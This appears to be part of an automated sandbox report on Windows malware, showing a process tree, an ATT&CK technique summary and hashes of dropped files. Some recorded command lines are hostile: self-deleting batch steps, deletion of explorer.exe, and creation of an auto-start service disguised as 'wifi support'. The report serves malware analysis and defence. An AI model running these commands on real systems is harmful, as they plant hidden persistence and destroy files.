                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:488
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                    2⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    • Checks processor information in registry
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    • Modifies registry class
                                                                                                    PID:1352
                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                  1⤵
                                                                                                  • Drops file in Windows directory
                                                                                                  • Modifies Internet Explorer settings
                                                                                                  • Modifies registry class
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:4708
                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                  1⤵
                                                                                                  • Modifies Internet Explorer settings
                                                                                                  PID:4860
                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                  1⤵
                                                                                                  • Modifies registry class
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:4748
                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                  1⤵
                                                                                                  • Modifies Internet Explorer settings
                                                                                                  • Modifies registry class
                                                                                                  PID:4828
                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                  1⤵
                                                                                                  • Modifies registry class
                                                                                                  PID:5540
                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                  1⤵
                                                                                                  • Modifies registry class
                                                                                                  PID:5984
                                                                                                • C:\Users\Admin\AppData\Local\Temp\85E5.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\85E5.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:5440
                                                                                                • C:\Users\Admin\AppData\Local\Temp\87F9.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\87F9.exe
                                                                                                  1⤵
                                                                                                    PID:2496
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9B34.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\9B34.exe
                                                                                                    1⤵
                                                                                                      PID:5256
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\9B34.exe"
                                                                                                        2⤵
                                                                                                          PID:5748
                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                            timeout /T 10 /NOBREAK
                                                                                                            3⤵
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:5932
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\A22B.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\A22B.exe
                                                                                                        1⤵
                                                                                                          PID:5420
                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                            2⤵
                                                                                                              PID:6036
                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                              2⤵
                                                                                                                PID:5032
                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                2⤵
                                                                                                                  PID:4292
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\A99E.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\A99E.exe
                                                                                                                1⤵
                                                                                                                  PID:5852
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\647349126.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\647349126.exe"
                                                                                                                    2⤵
                                                                                                                      PID:5588
                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                        3⤵
                                                                                                                          PID:2652
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1371397063.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\1371397063.exe"
                                                                                                                        2⤵
                                                                                                                          PID:5840
                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                            3⤵
                                                                                                                              PID:4628
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ABF1.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\ABF1.exe
                                                                                                                          1⤵
                                                                                                                            PID:5472
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AF1E.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\AF1E.exe
                                                                                                                            1⤵
                                                                                                                              PID:4476
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\B6FF.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\B6FF.exe
                                                                                                                              1⤵
                                                                                                                                PID:5512
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\C24A.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\C24A.exe
                                                                                                                                1⤵
                                                                                                                                  PID:4120
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                    2⤵
                                                                                                                                      PID:5728
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\CC2F.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\CC2F.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:4984
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\DDD3.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\DDD3.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:6040
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\E96D.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\E96D.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:5600
                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                            "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                                            2⤵
                                                                                                                                              PID:2236
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\44FF.tmp.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\44FF.tmp.exe"
                                                                                                                                                3⤵
                                                                                                                                                  PID:5012
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" "5012" "C:\Users\Admin\AppData\Roaming\44FF.tmp.exe""
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2200
                                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                                        taskkill /F /PID "5012"
                                                                                                                                                        5⤵
                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                        PID:5564
                                                                                                                                                      • C:\Windows\system32\choice.exe
                                                                                                                                                        choice /C Y /N /D Y /T 3
                                                                                                                                                        5⤵
                                                                                                                                                          PID:6116
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\4742.tmp.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\4742.tmp.exe"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:576
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\488B.tmp.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\488B.tmp.exe"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4172
                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:2712
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Windows\SysWOW64\explorer.exe" >> NUL
                                                                                                                                                            3⤵
                                                                                                                                                              PID:6068
                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                ping 127.0.0.1
                                                                                                                                                                4⤵
                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                PID:5268
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\F12E.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\F12E.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:1104
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\F4F8.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\F4F8.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:5948
                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:4820
                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:5296
                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:5332
                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:784
                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:5492
                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:4380
                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:4748
                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5764
                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:6060
                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:1020
                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:4532
                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:5504
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\D45D.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\D45D.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:6036
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6036 -s 868
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:3708
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6036 -s 892
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:5572
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6036 -s 924
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:2132
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6036 -s 1044
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:5040
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6036 -s 1064
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:4712
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6036 -s 1124
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:6132
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6036 -s 1136
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:5740
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6036 -s 1208
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:4048
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\DF1C.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\DF1C.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:1236
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\EC0D.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\EC0D.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:1304
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\tgkudlcr\
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:4132
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\aznpdabt.exe" C:\Windows\SysWOW64\tgkudlcr\
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:4172
                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" create tgkudlcr binPath= "C:\Windows\SysWOW64\tgkudlcr\aznpdabt.exe /d\"C:\Users\Admin\AppData\Local\Temp\EC0D.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:740
                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" description tgkudlcr "wifi internet conection"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:5272
                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                      "C:\Windows\System32\sc.exe" start tgkudlcr
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4352
                                                                                                                                                                                                      • C:\Users\Admin\qcbpaksm.exe
                                                                                                                                                                                                        "C:\Users\Admin\qcbpaksm.exe" /d"C:\Users\Admin\AppData\Local\Temp\EC0D.exe" /e5503011500000005
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:4600

                                                                                                                                                                                                      Network

                                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                      Persistence

                                                                                                                                                                                                      New Service

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1050

                                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1060

                                                                                                                                                                                                      BITS Jobs

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1197

                                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                                      New Service

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1050

                                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                                      3
                                                                                                                                                                                                      T1112

                                                                                                                                                                                                      BITS Jobs

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1197

                                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1130

                                                                                                                                                                                                      Credential Access

                                                                                                                                                                                                      Credentials in Files

                                                                                                                                                                                                      4
                                                                                                                                                                                                      T1081

                                                                                                                                                                                                      Discovery

                                                                                                                                                                                                      Software Discovery

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1518

                                                                                                                                                                                                      Query Registry

                                                                                                                                                                                                      4
                                                                                                                                                                                                      T1012

                                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                                      5
                                                                                                                                                                                                      T1082

                                                                                                                                                                                                      Security Software Discovery

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1063

                                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1120

                                                                                                                                                                                                      Remote System Discovery

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1018

                                                                                                                                                                                                      Collection

                                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                                      4
                                                                                                                                                                                                      T1005

                                                                                                                                                                                                      Command and Control

                                                                                                                                                                                                      Web Service

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1102

                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                                                                      • C:\Program Files\Windows Defender\AECLGBECAK\ultramediaburner.exe
                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                                                                      • C:\Program Files\Windows Defender\AECLGBECAK\ultramediaburner.exe
                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                                                                      • C:\Program Files\install.dat
                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        806c3221a013fec9530762750556c332

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                                                                                                      • C:\Program Files\install.dat
                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        31e4a5735b20be6a53cbb552663b1cc3

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                                                                                                                      • C:\Program Files\install.dll
                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                                                                                      • C:\Program Files\install.dll
                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                                                                                      • C:\Program Files\libEGL.dll
                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        cc0f81a657d6887e246f49151e60123d

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        1eb31528501c375817853e09d95b7152858c5b31

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        31fd8f7d1ab67c7b4f332d2d4518b99d2bb344ac577044b44551cd7e6f58dbbb

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        8ad3af4b0fef41dc20965429fd4dbb699131e92277f14c8af5882970fd192820c0f0e1a8369dbc8471fcb09fe778fb708c57dfdfcacd14cd6e84a238fcc84198

                                                                                                                                                                                                      • C:\ProgramData\5522956.exe
                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        6c275e3ad15bd4b6852dea757dff4dd1

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        673f52a43085a8fdc93fffe24f85213bb2ce1993

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        79e17f3dd9608d4897768138ce765aa3fbc253e65dd0b1031ea821cb68f3c1db

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        a8d2f693ccbba557d1e8b5cef567f49b63bd1bdcf867b624ae7417875dda07f177d3392010e39dd7ab9fb778fb0b6fe30359fb005a5305610c685949ca5a5f7b

                                                                                                                                                                                                      • C:\ProgramData\5522956.exe
                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        6c275e3ad15bd4b6852dea757dff4dd1

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        673f52a43085a8fdc93fffe24f85213bb2ce1993

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        79e17f3dd9608d4897768138ce765aa3fbc253e65dd0b1031ea821cb68f3c1db

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        a8d2f693ccbba557d1e8b5cef567f49b63bd1bdcf867b624ae7417875dda07f177d3392010e39dd7ab9fb778fb0b6fe30359fb005a5305610c685949ca5a5f7b

                                                                                                                                                                                                      • C:\ProgramData\6455283.exe
                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        055a20b8347170594cbc8b8aa2197b2a

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        9bd84ab6cb4df6cb0fd1c7a0fe7efe31357e1f10

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        03c8a390f7030ea876188436d6cbe99592b739d40a53e60ad0869c4c6194d828

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        914c928a4060ddc2bda4e96918c22c4df14160e869a6c5b62eeafe7bb1044006993532e55929d2d89bac08c1b896619b016a2caf6011d155646fb7421ba3b6f2

                                                                                                                                                                                                      • C:\ProgramData\6455283.exe
                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        055a20b8347170594cbc8b8aa2197b2a

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        9bd84ab6cb4df6cb0fd1c7a0fe7efe31357e1f10

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        03c8a390f7030ea876188436d6cbe99592b739d40a53e60ad0869c4c6194d828

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        914c928a4060ddc2bda4e96918c22c4df14160e869a6c5b62eeafe7bb1044006993532e55929d2d89bac08c1b896619b016a2caf6011d155646fb7421ba3b6f2

                                                                                                                                                                                                      • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        055a20b8347170594cbc8b8aa2197b2a

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        9bd84ab6cb4df6cb0fd1c7a0fe7efe31357e1f10

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        03c8a390f7030ea876188436d6cbe99592b739d40a53e60ad0869c4c6194d828

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        914c928a4060ddc2bda4e96918c22c4df14160e869a6c5b62eeafe7bb1044006993532e55929d2d89bac08c1b896619b016a2caf6011d155646fb7421ba3b6f2

                                                                                                                                                                                                      • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        055a20b8347170594cbc8b8aa2197b2a

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        9bd84ab6cb4df6cb0fd1c7a0fe7efe31357e1f10

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        03c8a390f7030ea876188436d6cbe99592b739d40a53e60ad0869c4c6194d828

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        914c928a4060ddc2bda4e96918c22c4df14160e869a6c5b62eeafe7bb1044006993532e55929d2d89bac08c1b896619b016a2caf6011d155646fb7421ba3b6f2

